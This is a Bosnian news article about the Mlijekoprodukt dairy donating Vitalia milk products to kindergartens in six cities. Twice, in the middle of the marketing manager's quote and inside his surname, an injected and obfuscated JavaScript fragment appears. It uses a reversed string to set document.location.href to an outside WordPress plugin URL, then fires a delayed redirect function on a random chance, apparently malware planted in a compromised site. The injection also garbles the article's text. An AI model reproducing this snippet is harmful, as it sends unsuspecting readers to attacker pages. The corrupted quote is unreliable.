Vitalia mliječni proizvodi za oko hiljadu mališana

Najveća domaća mljekara Mlijekoprodukt, koja posluje u okviru regionalnog lidera mliječne industrije Imleka, uručila je donaciju proizvoda brenda Vitalia
vrtićima iz šest gradova u Bosni i Hercegovini.

Donacija mlijeka i mliječnih proizvoda uručena je vrtićima u Banjaluci, Sarajevu, Prijedoru, Bijeljini, Foči i Kozarskoj Dubici.

Cilj akcije, prije svega, je podizanje svijesti o značaju konzumacije mlijeka i mliječnih proizvoda za zdravo i kvalitetno odrastanje, ali i obezbijeđivanje zdravih i ukusnih mliječnih obroka brojnim mališanima.

„Kao društveno odgovorna kompanija u svom poslovanju veliku pažnju posvećujemo upravo najmlađima jer su mlijeko i mliječni proizvodi veoma važan faktor u pravilnoj ishrani tokom odrastanja.

Ulaganjima u proizvodne procese Mlijekoprodukt kontinuirano tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unapređuje kvalitet finalnog proizvoda kako bi zadržao sve hranjive komponente, a takav pristup
pozicionirao je naše proizvode među najomiljenijim u zemlji“, izjavio je marketing menadžer Mlijekoprodukta, Vlado Stog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andić.

U vrtićima su izrazili zahvalnost Mlijekoproduktu, koji kroz brojne aktivnosti promoviše značaj uravnotežene i zdrave ishrane najmlađih.

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login